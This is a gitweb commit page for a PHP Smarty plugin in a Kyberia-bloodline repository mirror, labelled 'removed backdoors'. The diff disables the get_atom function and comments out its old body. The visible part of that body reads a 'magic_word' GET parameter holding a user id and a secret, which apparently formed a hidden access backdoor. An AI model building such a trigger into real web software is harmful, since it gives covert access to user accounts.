removed backdoors
[mirrors/Kyberia-bloodline.git] / wwwroot / inc / smarty / node_methodz / function.get_atom.php
index 102d3d52a4bf9f5d7a61939dfe5d13c330bcdb09..1d2eeee1ecc7566f3bb71e81caa8eafddc8e2df4 100644 (file)
@@ -1,8 +1,11 @@
 <?php
 
-       function smarty_function_get_atom($params,&$smarty) {
+function smarty_function_get_atom($params,&$smarty) {
+       // No more backdoors;)
+       return 23;
+       
 
-               global $db,$node;
+/*             global $db,$node;
                $node_id=$node['node_id'];
                if ( preg_match("/(\d+)-(.+)/",$_GET['magic_word'],$mu)) {
                          $magic_uid=$mu['1'];
@@ -20,5 +23,7 @@
                }
 
                $smarty->assign('get_atom',$get_atom);
-       }
+*/
+}
+
 ?>
This page took 0.127847 seconds and 4 git commands to generate.